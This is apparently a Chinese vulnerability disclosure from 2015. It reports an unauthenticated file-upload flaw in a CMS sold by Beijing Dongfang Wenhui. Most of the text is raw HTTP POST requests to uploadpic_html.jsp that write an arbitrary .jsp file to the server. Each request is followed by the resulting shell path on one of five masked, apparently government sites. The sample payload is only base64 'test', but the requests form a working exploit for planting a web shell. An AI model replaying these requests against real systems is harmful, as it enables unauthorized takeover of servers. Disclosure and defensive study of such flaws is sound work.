2015-10-10: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-24: 厂商已经主动忽略漏洞,细节向公众公开
RT
北京东方文辉信息技术有限公司官网地址:http://**.**.**.**版本:通杀无需登录等认证大量政府案例:uploadpic_html.jsp文件上传使用burpsuite发包:发包内容:
POST /cms/client/uploadpic_html.jsp?toname=xx.jsp&diskno=xxxx HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: JSESSIONID=399732FC1E9229FFDFC4590C881DF200Connection: keep-aliveContent-Type: multipart/form-data;Content-Length: 65<?xml version="1.0" encoding="UTF-8"?><root>dGVzdA==</root>
其中:dGVzdA==为base编码:test写入地址:/cms-data/temp_dir/xxxx/temp.files/xx.jsp
案例1:**.**.**.**:8088POST /nlw/cms/client/uploadpic_html.jsp?toname=xx.jsp&diskno=xxxx HTTP/1.1Host: **.**.**.**:8088User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: JSESSIONID=399732FC1E9229FFDFC4590C881DF200Connection: keep-aliveContent-Type: multipart/form-data;Content-Length: 65<?xml version="1.0" encoding="UTF-8"?><root>dGVzdA==</root>shell地址:http://**.**.**.**:8088/nlw/cms-data/temp_dir/xxxx/temp.files/xx.jsp
案例2:**.**.**.**POST /cms/client/uploadpic_html.jsp?toname=xx.jsp&diskno=xxxx HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: JSESSIONID=399732FC1E9229FFDFC4590C881DF200Connection: keep-aliveContent-Type: multipart/form-data;Content-Length: 65<?xml version="1.0" encoding="UTF-8"?><root>dGVzdA==</root>shell地址:http://**.**.**.**/cms-data/temp_dir/xxxx/temp.files/xx.jsp
案例3:http://**.**.**.**/POST /cms/client/uploadpic_html.jsp?toname=xx.jsp&diskno=xxxx HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: JSESSIONID=399732FC1E9229FFDFC4590C881DF200Connection: keep-aliveContent-Type: multipart/form-data;Content-Length: 65<?xml version="1.0" encoding="UTF-8"?><root>dGVzdA==</root>shell:http://**.**.**.**/cms-data/temp_dir/xxxx/temp.files/xx.jsp
案例4:http://**.**.**.**/POST /cms/client/uploadpic_html.jsp?toname=xx.jsp&diskno=xxxx HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: JSESSIONID=399732FC1E9229FFDFC4590C881DF200Connection: keep-aliveContent-Type: multipart/form-data;Content-Length: 65<?xml version="1.0" encoding="UTF-8"?><root>dGVzdA==</root>shell:http://**.**.**.**/cms-data/temp_dir/xxxx/temp.files/xx.jsp
案例5:http://**.**.**.**/POST /fsm/cms/client/uploadpic_html.jsp?toname=xx.jsp&diskno=xxxx HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: JSESSIONID=399732FC1E9229FFDFC4590C881DF200Connection: keep-aliveContent-Type: multipart/form-data;Content-Length: 65<?xml version="1.0" encoding="UTF-8"?><root>dGVzdA==</root>shell地址:http://**.**.**.**/fsm/cms-data/temp_dir/xxxx/temp.files/xx.jsp
如上
未能联系到厂商或者厂商积极拒绝